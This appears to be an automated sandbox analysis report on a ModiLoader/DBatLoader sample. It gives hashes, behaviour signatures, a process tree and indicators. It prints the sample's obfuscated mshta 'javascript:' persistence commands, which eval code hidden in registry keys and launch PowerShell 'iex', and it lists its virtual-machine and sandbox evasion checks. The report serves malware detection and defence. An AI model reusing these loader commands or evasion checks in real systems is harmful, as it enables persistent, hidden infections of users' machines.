Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
14/09/2024, 18:48
Static task
static1
Behavioral task
behavioral1
Sample
e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe
-
Size
240KB
-
MD5
e0ced5e9d4ed7f8ea0ba5e616df4ab4a
-
SHA1
61933f101244016284f26eb8ed50bbeaef2d0bc8
-
SHA256
b70469d8c92cf656312410cb70856052a1a3a5acf86c6ce56886e0cb0af1689a
-
SHA512
ac34c1aa5ce669e9bcf87e25130d389f7c67bc1211542f8b2caecb68e8960c6cb21bb4aaf37b9425e984737df90ae67fb6e56e833b35785ebeb3639029a349f4
-
SSDEEP
6144:6KzkPr4yfkDAp18uJmp8DO9AHYPvRV/5HBQqjqRY2:6Kmr4yfkDAb8r2Oyaj/vqRY2
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1628 1672 mshta.exe 31 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
description ioc Process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 53 IoCs
resource yara_rule behavioral1/memory/2488-4-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2488-6-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2488-12-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2488-13-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2488-10-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2488-8-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2488-14-0x0000000001C70000-0x0000000001D46000-memory.dmp modiloader_stage2 behavioral1/memory/2488-15-0x0000000001C70000-0x0000000001D46000-memory.dmp modiloader_stage2 behavioral1/memory/2488-16-0x0000000001C70000-0x0000000001D46000-memory.dmp modiloader_stage2 behavioral1/memory/2488-18-0x0000000001C70000-0x0000000001D46000-memory.dmp modiloader_stage2 behavioral1/memory/2488-17-0x0000000001C70000-0x0000000001D46000-memory.dmp modiloader_stage2 behavioral1/memory/2488-19-0x0000000001C70000-0x0000000001D46000-memory.dmp modiloader_stage2 behavioral1/memory/2488-20-0x0000000001C70000-0x0000000001D46000-memory.dmp modiloader_stage2 behavioral1/memory/2740-30-0x0000000006230000-0x0000000006306000-memory.dmp modiloader_stage2 behavioral1/memory/1244-31-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/2740-33-0x0000000006230000-0x0000000006306000-memory.dmp modiloader_stage2 behavioral1/memory/1244-34-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-49-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-57-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-66-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-68-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-65-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-64-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-63-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-62-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-56-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-55-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-54-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-53-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-52-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-51-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-48-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-47-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-46-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-45-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-44-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-43-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-42-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-41-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-74-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-40-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-39-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-38-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-37-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-36-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-35-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/1244-50-0x00000000001F0000-0x0000000000331000-memory.dmp modiloader_stage2 behavioral1/memory/2740-32-0x0000000002D80000-0x0000000004D80000-memory.dmp modiloader_stage2 behavioral1/memory/1744-75-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/1744-78-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/1744-77-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/1744-76-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 behavioral1/memory/1744-80-0x0000000000260000-0x00000000003A1000-memory.dmp modiloader_stage2 -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
pid Process 1244 regsvr32.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9bcc.lnk regsvr32.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\197b\\145e.lnk\"" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:Kx2bo=\"P\";E5d=new%20ActiveXObject(\"WScript.Shell\");urzF4cT=\"a73Yjb4g\";Y15TwR=E5d.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\jqeubg\\\\drncuqpgdr\");KdB16uPFF=\"l02Mw\";eval(Y15TwR);U0we0FdN=\"fo\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:uxSz2H=\"it\";q0f9=new%20ActiveXObject(\"WScript.Shell\");NMSv0=\"h96ymT\";VNGA73=q0f9.RegRead(\"HKCU\\\\software\\\\jqeubg\\\\drncuqpgdr\");Cor8RVuR=\"r7\";eval(VNGA73);nQqg35L=\"TTpGxuX\";" regsvr32.exe -
pid Process 2740 powershell.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1964 set thread context of 2488 1964 e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe 30 PID 2740 set thread context of 1244 2740 powershell.exe 36 PID 1244 set thread context of 1744 1244 regsvr32.exe 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\.fea39 regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\.fea39\ = "7181" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\7181 regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\7181\shell regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\7181\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\7181\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\7181\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:ja2oukg0p=\"VnBo\";G4p=new ActiveXObject(\"WScript.Shell\");IbIRTv7O=\"l\";eOI3V=G4p.RegRead(\"HKCU\\\\software\\\\jqeubg\\\\drncuqpgdr\");dv9wT5=\"luY0Sc\";eval(eOI3V);fmrb5L=\"L\";\"" regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2740 powershell.exe 2740 powershell.exe 2740 powershell.exe 2740 powershell.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe 1244 regsvr32.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2740 powershell.exe 1244 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2740 powershell.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 1964 wrote to memory of 2488 1964 e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe 30 PID 1964 wrote to memory of 2488 1964 e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe 30 PID 1964 wrote to memory of 2488 1964 e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe 30 PID 1964 wrote to memory of 2488 1964 e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe 30 PID 1964 wrote to memory of 2488 1964 e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe 30 PID 1964 wrote to memory of 2488 1964 e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe 30 PID 1964 wrote to memory of 2488 1964 e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe 30 PID 1964 wrote to memory of 2488 1964 e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe 30 PID 1964 wrote to memory of 2488 1964 e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe 30 PID 1628 wrote to memory of 2740 1628 mshta.exe 33 PID 1628 wrote to memory of 2740 1628 mshta.exe 33 PID 1628 wrote to memory of 2740 1628 mshta.exe 33 PID 1628 wrote to memory of 2740 1628 mshta.exe 33 PID 2740 wrote to memory of 1244 2740 powershell.exe 36 PID 2740 wrote to memory of 1244 2740 powershell.exe 36 PID 2740 wrote to memory of 1244 2740 powershell.exe 36 PID 2740 wrote to memory of 1244 2740 powershell.exe 36 PID 2740 wrote to memory of 1244 2740 powershell.exe 36 PID 2740 wrote to memory of 1244 2740 powershell.exe 36 PID 2740 wrote to memory of 1244 2740 powershell.exe 36 PID 2740 wrote to memory of 1244 2740 powershell.exe 36 PID 1244 wrote to memory of 1744 1244 regsvr32.exe 37 PID 1244 wrote to memory of 1744 1244 regsvr32.exe 37 PID 1244 wrote to memory of 1744 1244 regsvr32.exe 37 PID 1244 wrote to memory of 1744 1244 regsvr32.exe 37 PID 1244 wrote to memory of 1744 1244 regsvr32.exe 37 PID 1244 wrote to memory of 1744 1244 regsvr32.exe 37 PID 1244 wrote to memory of 1744 1244 regsvr32.exe 37 PID 1244 wrote to memory of 1744 1244 regsvr32.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Users\Admin\AppData\Local\Temp\e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e0ced5e9d4ed7f8ea0ba5e616df4ab4a_JaffaCakes118.exe2⤵
- System Location Discovery: System Language Discovery
PID:2488
-
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:a6xAu2Ns="XYoqM";d2K=new%20ActiveXObject("WScript.Shell");Em3opZn="4obrOgn";yp6sw0=d2K.RegRead("HKLM\\software\\Wow6432Node\\UV5uOCXf\\IoYv0Z");BXS1O="ce";eval(yp6sw0);ftSe9nK="UKuZwyRP";1⤵
- Process spawned unexpected child process
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:twbi2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1744
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
861B
MD54014a376eb7f5c9781d843ed2c7bcb8c
SHA1d313dfc6a6aeedbc9721dfaceb76b396cf6ee5a3
SHA25623750e7e577c3e46439d88bfe3ee50e79619c94187b9c53994168b378fe2c920
SHA5129d71f2253636b7104ec727e5af86c3374f8dd1a102962471d4859860be21ff597223cba7ba51e82aacd2c9203185f9811c3da28e1b71cd19881942a3861bb188
-
Filesize
55B
MD505907f10e4600033b6b644c94bdd1bc4
SHA18f5c2350384f4d749c907adee9a6c5377e4737f9
SHA256f49b034b1a02c0fce7a337a4de9ad9984bcd86faae49af59de7044829349c4d1
SHA512fed75cfa4120e4a8bfc0c187ffc23c5ec9a38d325a1a34b81d855a7d036e2308b436e5e56dca05eb4a3658539407ccd3bf743f184251558d562af11693347167
-
Filesize
42KB
MD55a5cbe7ba0bf5b4c88c28d69537a1066
SHA14452f400815d27ce7292da10db72338cf494eabe
SHA2566a00fed8e6a42fefef718098168ff4e4e0c938e118f7f2bb619f8c746cde9da5
SHA51277557a5094fef2fc7398fec9bb07c16c9cb8d7b01e2055392995005a244c7e83e355ebd6d3a4ceca414e3dcdff14a6b9deae82d6f511624d2aef156aae006403
-
Filesize
979B
MD56068e1057647f34b7cb01ea04d6a4b07
SHA148a561a673fcee5e85e6ed6a86dceaf98caa2d5c
SHA25612a028cc0b7125566a6eede71d1ec7363a35a38b748ba4f9670cec075a0e44e6
SHA512d23d69decf2bab47d3e94c6dea3757c9323883c945c26d4fec064e9366bf8887b2d61f126252878183518646dca1d3666af3dbac0d63e7b89793b08141805d8c
-
Filesize
47KB
MD57e6e2f739574f2f9e0c5e9229c308970
SHA156dc4c8b04af4bba0436b7aab8e52c392096bda0
SHA256a6a774098aea1adb7d7d9528de8039043f03e8c9c0907656b80a549a4789ba29
SHA512d4fe0d70b36cc67998b3d250f307ed980f6f5f62a6339dfd017f65d201058db4151cc687ca711ee4f30a70c487e016bed9b1ae57d67368416ecb3ded346639f4